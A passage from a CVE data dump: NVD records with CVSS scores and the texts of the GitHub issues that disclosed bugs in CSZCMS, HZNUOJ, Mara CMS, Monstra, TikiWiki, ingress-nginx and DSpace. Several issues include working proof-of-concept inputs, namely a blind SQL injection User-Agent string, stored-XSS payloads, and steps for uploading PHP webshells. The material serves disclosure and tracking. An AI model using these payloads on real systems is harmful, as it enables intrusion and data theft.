"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/cskaza/cszcms/issues/22"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/cskaza/cszcms/issues/22"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:cszcms:csz_cms:1.2.4:*:*:*:*:*:*:*",
"matchCriteriaId": "06BDEA94-6AA0-4AC0-B769-F41D2FCCBB5E",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/cskaza/cszcms/issues/22 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"cskaza",
"cszcms"
] | Hi, @cskaza and I found an arbitrary file upload vulnerability in cszcms-1.2.4. The vulnerable code is on cszcms/core/MY_Security.php file line 47.

I think using the function ‘escape-string’ can solve the sql injection vulnerability,but you use function 'xss_clean' after it.The function 'xss_clean' can decode str with function 'rawurldecode',so I can exploit like #19 .
Urlencode the value of UA:
Before:
User-Agent: '-( if(1=1, sleep(5), 1) )-'', '192.168.1.11','time') #
After:
User-Agent: %27%2d%28%20%69%66%28%31%3d%31%2c%20%73%6c%65%65%70%28%35%29%2c%20%31%29%20%29%2d%27%27%2c%20%27%31%39%32%2e%31%36%38%2e%31%2e%31%31%27%2c%27%74%69%6d%65%27%29%20%23

Suggest: Remove function 'xss_clean' here.
| Time-based blind SQL injection Vulnerability in CSZCMS-1.2.4 | https://api.github.com/repos/cskaza/cszcms/issues/22/comments | 2 | 2019-11-14T06:26:14Z | 2019-11-27T16:27:29Z | https://github.com/cskaza/cszcms/issues/22 | 522,652,620 | 22 | 2,718 |
CVE-2020-22312 | 2021-10-28T15:15:07.027 | A cross-site scripting (XSS) vulnerability was discovered in the OJ/admin-tool /cal_scores.php function of HZNUOJ v1.0. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/wlx65003/HZNUOJ/issues/17"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/wlx65003/HZNUOJ/issues/17"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:hznuoj_project:hznuoj:1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "D8A15FBC-ADF4-4CD1-9EF9-FC5F7757A08A",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/wlx65003/HZNUOJ/issues/17 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"wlx65003",
"HZNUOJ"
] |
## description
The code problem occurred in `OJ / admin-tools / cal_scores.php`. The` $ realname` in the output form was obtained from the database. There was no filtering of angle brackets “<>” during registration, which caused the reorganization here. xss injection

## Attack process
```
First register an account on the /OJ/modifypage.php page,Class is "软工163",Real Name is
<details open ontoggle=['yds_is_so_handsome'].find(\u0070rompt)>
```

Then visit `/ OJ / admin-tools / cal_scores.php`, set the classList to soft 软工163, and click submit

the attack works

## poc
```
<details open ontoggle=['yds_is_so_handsome'].find(\u0070rompt)>
``` | Strict SQL filtering leads to xss injection vulnerability | https://api.github.com/repos/lixin-wei/HZNUOJ/issues/17/comments | 1 | 2020-02-25T08:32:50Z | 2020-03-15T12:08:26Z | https://github.com/lixin-wei/HZNUOJ/issues/17 | 570,397,160 | 17 | 2,719 |
CVE-2020-25422 | 2021-10-28T19:15:08.530 | A cross site scripting (XSS) vulnerability in menuedit.php of Mara CMS 7.5 allows attackers to execute arbitrary web scripts or HTML via a crafted payload. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 6.8,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.3,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/r0ck3t1973/xss_payload/issues/2"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/r0ck3t1973/xss_payload/issues/2"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:mara_cms_project:mara_cms:7.5:*:*:*:*:*:*:*",
"matchCriteriaId": "F7300FC2-5DCB-48EC-A420-B10B6E7FE97B",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/r0ck3t1973/xss_payload/issues/2 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"r0ck3t1973",
"xss_payload"
] | /*Describe the bug*/
An authenticated malicious user can take advantage of a Stored XSS vulnerability in the "Edit Menu" feature.
To Reproduce
/*Steps to reproduce the behavior*/:
1, Login into the panel
2. Go to '/Mara/codebase/menuedit.php'
3. Insert Payload:
"><strong><script>alert(document.domain)</script><font color="green" size=14px>Hello world!</font></strong>
4. Click Test: Alert XSS Message
5. Save and go to Admin Panel
6. Alert XSS Message
/*Expected behavior*/
The removal of script tags is not sufficient to prevent an XSS attack. You must HTML Entity encode any output that is reflected back to the page
/*Screenshots*/
1. go to '/Mara/codebase/menuedit.php'

2. Insert Payload

3. Click Test: Alert XSS Message

4. Save and go to Admin Panel
5. Alert XSS Message

/Desktop (please complete the following information):/
OS: Windows
Browser: All
I Hope you fix it ASAP | Cross Site Script Vulnerability on "Edit Menu" in Mara 7.5 | https://api.github.com/repos/r0ck3t1973/xss_payload/issues/2/comments | 0 | 2020-09-01T08:41:16Z | 2021-10-18T15:48:33Z | https://github.com/r0ck3t1973/xss_payload/issues/2 | 689,947,569 | 2 | 2,720 |
CVE-2021-36547 | 2021-10-28T20:15:07.477 | A remote code execution (RCE) vulnerability in the component /codebase/dir.php?type=filenew of Mara v7.5 allows attackers to execute arbitrary commands via a crafted PHP file. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/r0ck3t1973/RCE/issues/1"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/r0ck3t1973/RCE/issues/1"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:mara_cms_project:mara_cms:7.5:*:*:*:*:*:*:*",
"matchCriteriaId": "F7300FC2-5DCB-48EC-A420-B10B6E7FE97B",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"434"
] | 434 | https://github.com/r0ck3t1973/RCE/issues/1 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"r0ck3t1973",
"RCE"
] | /*Describe the bug*/
An attacker could insert any executable code through php via File to execution command in the server
/*To Reproduce*/
1. Log into the panel.
2. Click "File" >> New (Mara/codebase/dir.php?type=filenew)
3. Click File Upload
4. Insert payload php: r0ck3t-1973.php
5. Save and Exit
6. Go to Mara/img/r0ck3t-1973.php
/*Screenhost*/
1. 
2. 
3. 
| Remote Code Execution via File in Mara version 7.5 | https://api.github.com/repos/r0ck3t1973/RCE/issues/1/comments | 1 | 2020-09-01T08:04:38Z | 2021-11-11T14:11:37Z | https://github.com/r0ck3t1973/RCE/issues/1 | 689,921,362 | 1 | 2,721 |
CVE-2021-36548 | 2021-10-28T20:15:07.533 | A remote code execution (RCE) vulnerability in the component /admin/index.php?id=themes&action=edit_template&filename=blog of Monstra v3.0.4 allows attackers to execute arbitrary commands via a crafted PHP file. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/monstra-cms/monstra/issues/470"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/monstra-cms/monstra/issues/470"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:monstra:monstra:3.0.4:*:*:*:*:*:*:*",
"matchCriteriaId": "13838C95-223E-4896-AA83-B437EFD45660",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"434"
] | 434 | https://github.com/monstra-cms/monstra/issues/470 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"monstra-cms",
"monstra"
] | Describe the bug
An attacker could insert any executable code through php via Theme Blog to execution command in the server
To Reproduce
1. Log into the panel.
2. Go to "/monstra-3.0.4/admin/index.php?id=themes&action=edit_template&filename=blog"
3. Click edit Blog
4. Insert payload easy-simple-php-webshell.php
5. Reload page review code excution


| RCE (Remote Code Execution via Theme Blog Monstra version 3.0.4) | https://api.github.com/repos/monstra-cms/monstra/issues/470/comments | 0 | 2021-07-05T02:51:41Z | 2021-10-29T15:41:57Z | https://github.com/monstra-cms/monstra/issues/470 | 936,628,926 | 470 | 2,722 |
CVE-2021-36550 | 2021-10-28T20:15:07.580 | TikiWiki v21.4 was discovered to contain a cross-site scripting (XSS) vulnerability in the component tiki-browse_categories.php. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload under the Create category module. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 6.8,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.3,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/r0ck3t1973/xss_payload/issues/6"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/r0ck3t1973/xss_payload/issues/6"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:tiki:tikiwiki_cms\\/groupware:21.4:*:*:*:*:*:*:*",
"matchCriteriaId": "0F0B82A2-9FBD-4157-9961-2F3EC8C3F1B1",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/r0ck3t1973/xss_payload/issues/6 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"r0ck3t1973",
"xss_payload"
] | Hi, I found stored xss in Categories.
To Reproduce
1. Login into the panel
2. Go to Documents: 'tiki-21.4/tiki-index.php'
3. Click Categories: '/tiki-21.4/tiki-browse_categories.php'
4. Create category
5. insert payload bypass xss:
`<a href="javascript:alert(1337)">Click2</a>`
7. Click Categories >> Click2 >> Boom alert message xss!
**Impact**
Commonly include transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user’s machine under the guise of the vulnerable site.
**POC**



| Bypass Cross Site Script Vulnerability on "Categories" in TikiWiki version 21.4 | https://api.github.com/repos/r0ck3t1973/xss_payload/issues/6/comments | 0 | 2021-07-07T12:52:26Z | 2021-07-07T12:54:28Z | https://github.com/r0ck3t1973/xss_payload/issues/6 | 938,860,743 | 6 | 2,723 |
CVE-2021-36551 | 2021-10-28T20:15:07.627 | TikiWiki v21.4 was discovered to contain a cross-site scripting (XSS) vulnerability in the component tiki-calendar.php. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload under the Add Event module. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 6.8,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.3,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/r0ck3t1973/xss_payload/issues/7"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/r0ck3t1973/xss_payload/issues/7"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:tiki:tikiwiki_cms\\/groupware:21.4:*:*:*:*:*:*:*",
"matchCriteriaId": "0F0B82A2-9FBD-4157-9961-2F3EC8C3F1B1",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/r0ck3t1973/xss_payload/issues/7 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"r0ck3t1973",
"xss_payload"
] | Hi Team,
I found stored xss in Calendar
To Reproduce
1. Login into panel
2. Go to Documents: '/tiki-21.4/tiki-index.php'
3. Click Calendar: '/tiki-21.4/tiki-calendar.php'
4. Click Add Event
5. insert payload bypass xss in Description
`<a href="javascript:alert(document.domain)">Click Here</a>`
7. Click Details Event >> ClickHere>> Boom alert message xss!
**Impact**
Commonly include transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user’s machine under the guise of the vulnerable site.
**POC**



| Bypass Cross Site Script Vulnerability on "Calendar" in TikiWiki version 21.4 | https://api.github.com/repos/r0ck3t1973/xss_payload/issues/7/comments | 0 | 2021-07-07T12:53:38Z | 2021-07-07T12:53:38Z | https://github.com/r0ck3t1973/xss_payload/issues/7 | 938,861,903 | 7 | 2,724 |
CVE-2021-25742 | 2021-10-29T04:15:08.220 | A security issue was discovered in ingress-nginx where a user that can create or update ingress objects can use the custom snippets feature to obtain all secrets in the cluster. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "NONE",
"baseScore": 5.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 8,
"impactScore": 4.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 7.6,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 4.7,
"source": "jordan@liggitt.net",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 4.2,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "jordan@liggitt.net",
"tags": [
"Exploit",
"Issue Tracking",
"Mitigation",
"Third Party Advisory"
],
"url": "https://github.com/kubernetes/ingress-nginx/issues/7837"
},
{
"source": "jordan@liggitt.net",
"tags": [
"Mailing List",
"Mitigation",
"Third Party Advisory"
],
"url": "https://groups.google.com/g/kubernetes-security-announce/c/mT4JJxi9tQY"
},
{
"source": "jordan@liggitt.net",
"tags": [
"Third Party Advisory"
],
"url": "https://security.netapp.com/advisory/ntap-20211203-0001/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Mitigation",
"Third Party Advisory"
],
"url": "https://github.com/kubernetes/ingress-nginx/issues/7837"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Mitigation",
"Third Party Advisory"
],
"url": "https://groups.google.com/g/kubernetes-security-announce/c/mT4JJxi9tQY"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://security.netapp.com/advisory/ntap-20211203-0001/"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:kubernetes:ingress-nginx:*:*:*:*:*:*:*:*",
"matchCriteriaId": "CEC0CA26-0429-4DD1-904B-5C7637C42704",
"versionEndExcluding": "0.49.1",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:kubernetes:ingress-nginx:1.0.0:*:*:*:*:*:*:*",
"matchCriteriaId": "8DA09AFA-48CD-4A55-9C15-A96249C704D0",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:netapp:trident:-:*:*:*:*:*:*:*",
"matchCriteriaId": "5D9A34F5-AC03-4098-A37D-AD50727DDB11",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"20"
] | 20 | https://github.com/kubernetes/ingress-nginx/issues/7837 | [
"Exploit",
"Issue Tracking",
"Mitigation",
"Third Party Advisory"
] | github.com | [
"kubernetes",
"ingress-nginx"
] | ### Issue Details
A security issue was discovered in ingress-nginx where a user that can create or update ingress objects can use the custom snippets feature to obtain all secrets in the cluster.
This issue has been rated **High** ([CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L](https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L)), and assigned **CVE-2021-25742**.
### Affected Components and Configurations
This bug affects ingress-nginx.
Multitenant environments where non-admin users have permissions to create Ingress objects are most affected by this issue.
#### Affected Versions with no mitigation
- v1.0.0
- <= v0.49.0
#### Versions allowing mitigation
This issue cannot be fixed solely by upgrading ingress-nginx. It can be mitigated in the following versions:
- v1.0.1
- v0.49.1
### Mitigation
To mitigate this vulnerability:
1. Upgrade to a version that allows mitigation, (>= v0.49.1 or >= v1.0.1)
2. Set [allow-snippet-annotations](https://kubernetes.github.io/ingress-nginx/user-guide/nginx-configuration/configmap/#allow-snippet-annotations) to false in your ingress-nginx ConfigMap based on how you deploy ingress-nginx:
**Static Deploy Files**
Edit the ConfigMap for ingress-nginx **after** deployment:
```
kubectl edit configmap -n ingress-nginx ingress-nginx-controller
```
Add directive:
````
data:
allow-snippet-annotations: “false”
````
More information on the ConfigMap [here](https://kubernetes.github.io/ingress-nginx/user-guide/nginx-configuration/configmap/)
**Deploying Via Helm**
Set `controller.allowSnippetAnnotations` to `false` in the Values.yaml or add the directive to the helm deploy:
```
helm install [RELEASE_NAME] --set controller.allowSnippetAnnotations=false ingress-nginx/ingress-nginx
````
[https://github.com/kubernetes/ingress-nginx/blob/controller-v1.0.1/charts/ingress-nginx/values.yaml#L76](https://github.com/kubernetes/ingress-nginx/blob/controller-v1.0.1/charts/ingress-nginx/values.yaml#L76)
### Detection
If you find evidence that this vulnerability has been exploited, please contact security@kubernetes.io
Additional Details
See ingress-nginx Issue kubernetes/kubernetes#126811 for more details.
### Acknowledgements
This vulnerability was reported by Mitch Hulscher.
Thank You,
CJ Cullen on behalf of the Kubernetes Security Response Committee
| CVE-2021-25742: Ingress-nginx custom snippets allows retrieval of ingress-nginx serviceaccount token and secrets across all namespaces | https://api.github.com/repos/kubernetes/kubernetes/issues/126811/comments | 63 | 2021-10-21T16:08:21Z | 2024-08-20T13:17:02Z | https://github.com/kubernetes/kubernetes/issues/126811 | 2,475,614,887 | 126,811 | 2,725 |
CVE-2021-41189 | 2021-10-29T18:15:08.167 | DSpace is an open source turnkey repository application. In version 7.0, any community or collection administrator can escalate their permission up to become system administrator. This vulnerability only exists in 7.0 and does not impact 6.x or below. This issue is patched in version 7.1. As a workaround, users of 7.0 may temporarily disable the ability for community or collection administrators to manage permissions or workflows settings. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "COMPLETE",
"baseScore": 9,
"confidentialityImpact": "COMPLETE",
"integrityImpact": "COMPLETE",
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
},
"exploitabilityScore": 8,
"impactScore": 10,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.2,
"impactScore": 5.9,
"source": "security-advisories@github.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
